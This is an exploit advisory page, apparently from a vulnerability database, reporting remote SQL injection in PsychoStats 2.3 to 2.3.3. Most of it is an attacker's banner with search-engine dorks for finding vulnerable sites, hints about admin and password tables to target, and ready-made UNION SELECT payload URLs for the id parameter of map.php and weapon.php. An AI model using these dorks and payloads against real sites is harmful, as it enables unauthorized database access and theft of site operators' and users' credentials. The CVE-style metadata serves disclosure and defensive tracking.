PsychoStats <= 2.3.3 Multiple Remote SQL Injection Vulnerabilities

2009-03-09 / 2009-03-10
Credit: Mr.SQL
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################### #################### Viva IslaM Viva IslaM #################### ## ## rEm0te SQL InjEction VulnErability ## ## PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - )) ( map.php id ) & ( weapon.php id ) ## ############################################################### ############################################################### ## ## AuTh0r : Mr.SQL -(:: ThE Geek InjEcT0r ::)- ## ## H0ME : WwW.PaL-HaCkEr.CoM ## ## Email : SQL@Hotmail.it ## ######################### ######################### ## ## Script Name : PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - )) ## ## Download ScriptS : www.psychostats.com/downloads/ ## ## D0rk F0r all Versions :: "Powered by PsychoStats" ## ######################### ######################### n0te :: Tables (( psuser 0r ps_user 0r psadmin 0r pas_admin )) get the table_name maybe Sites changed tables :)) :: columns (( username 0r password 0r plr 0r name )) & in the exploit dont use - n0te :: The Script have diffrent Versions you can get the source and search for other bugs ######################### ######################### ## ## PsychoStats v2.3 ## ## D0rK :: "Powered by PsychoStats v2.3" ## ######################### ## ## -(:: SQL ::)- ## ## www.site.com/ ## weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ## ######################### ######################### ######################### ######################### ## ## PsychoStats v2.3.1 ## ## D0rK :: "Powered by PsychoStats v2.3.1" ## ######################### ## ## -(:: SQL ::)- ## ## www.site.com/ ## map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17-- ## ######################### ######################### ######################### ######################### ## ## PsychoStats v2.3.3 ## ## D0rK :: "Powered by PsychoStats v2.3.3" ## ######################### ## ## -(:: SQL ::)- ## ## www.site.com/ ## weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* ## ######################### ######################### ############################################################################# -(:: Gr3E3E3E3E3E3E3Tz ::)- :: HaCkEr-EGy :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: #############################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top